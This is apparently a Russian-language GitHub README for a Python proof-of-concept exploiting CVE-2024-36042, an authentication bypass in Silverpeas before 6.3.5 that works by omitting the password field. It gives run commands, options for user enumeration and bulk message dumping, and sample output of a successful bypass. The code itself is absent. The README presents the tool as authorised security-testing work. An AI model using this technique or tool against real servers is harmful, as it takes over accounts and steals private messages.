
Python PoC для обхода аутентификации CVE-2024-36042 в Silverpeas < 6.3.5. Возможности: определение версии, многопоточное перечисление пользователей, извлечение сообщений и структурированная отчётность для авторизованного тестирования безопасности.
Чистый, профессиональный Python3 proof-of-concept для CVE-2024-36042 — обход аутентификации в Silverpeas < 6.3.5, вызванный отсутствием проверки пароля в
AuthenticationServlet.
Silverpeas AuthenticationServlet принимает запрос на вход даже при отсутствии параметра Password в теле POST, предоставляя доступ к аутентифицированной сессии под любым известным именем пользователя. Инструмент ответственно демонстрирует уязвимость через модульный многопоточный каркас эксплойта с расширенной разведкой, извлечением данных и профессиональной генерацией отчётов.
Затронутые версии: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
Инструмент поддерживает четыре основных режима вывода для собранных сообщений через --message-output:
console (по умолчанию): выводит очищенные сообщения прямо в терминал с подсветкой ключевых слов.markdown: создаёт единый отчёт {username}_messages.md для каждой учётной записи в выходном каталоге.files: создаёт папку для каждой учётной записи и сохраняет каждое сообщение в отдельный файл (например, message_0006.md) с ID, дополненными нулями, для корректной сортировки в файловой системе.both: объединяет режимы console и markdown.outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (optional: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Base URL of Silverpeas (required)
-u, --user Single username to target
--userlist File with one username per line
--dump-messages Scrape and display inbox messages
--max-id Max message ID to check (default: 50)
--threads Concurrent workers (default: 5)
--proxy HTTP proxy URL
--message-output Output mode: {console, markdown, files, both}
--output-format File format: {md, txt}
--json Export full JSON report
--csv Export CSV of scraped messages
--outdir Output directory for exports
--no-color Disable ANSI color output (useful for logs)
--save-raw-html Save original HTML responses for debugging
--check-version Fingerprint version only
--no-exploit Skip exploitation (pair with --check-version)
--quiet, -q Minimal output
--no-banner Suppress banner
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.
[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account │ Status │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCESS │ 6 │
│ admin │ FAILED │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON report -> ./report_20260516_013210.json
Этот репозиторий — часть моего портфолио по offensive-безопасности. Он демонстрирует:
Этот инструмент предоставляется только для авторизованного тестирования безопасности, исследований и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте явное разрешение перед тестированием любой инфраструктуры, которая вам не принадлежит.
MIT
| Возможность | Описание |
|---|
| Определение версии | Определяет версию Silverpeas и статус уязвимости до эксплуатации. |
| Многопоточность | Одновременный перебор пользователей через ThreadPoolExecutor с потокобезопасным выводом. |
| Расширенное обнаружение | Многоязычное (английский/французский) обнаружение конечных точек с проверкой нескольких ID. |
| Извлечение данных | Высокоточный сбор сообщений с дедупликацией и фильтрацией шаблонного содержимого. |
| Гибкий вывод | Поддержка консоли, Markdown-отчётов и экспорта отдельных файлов (.md или .txt). |
| Прокси и отладка | Маршрутизация через Burp/ZAP (--proxy) и сохранение исходного HTML для отладки парсера. |
| Чистый UX | ASCII-таблицы сводок, подсветка ключевых слов и опциональное управление ANSI-цветами. |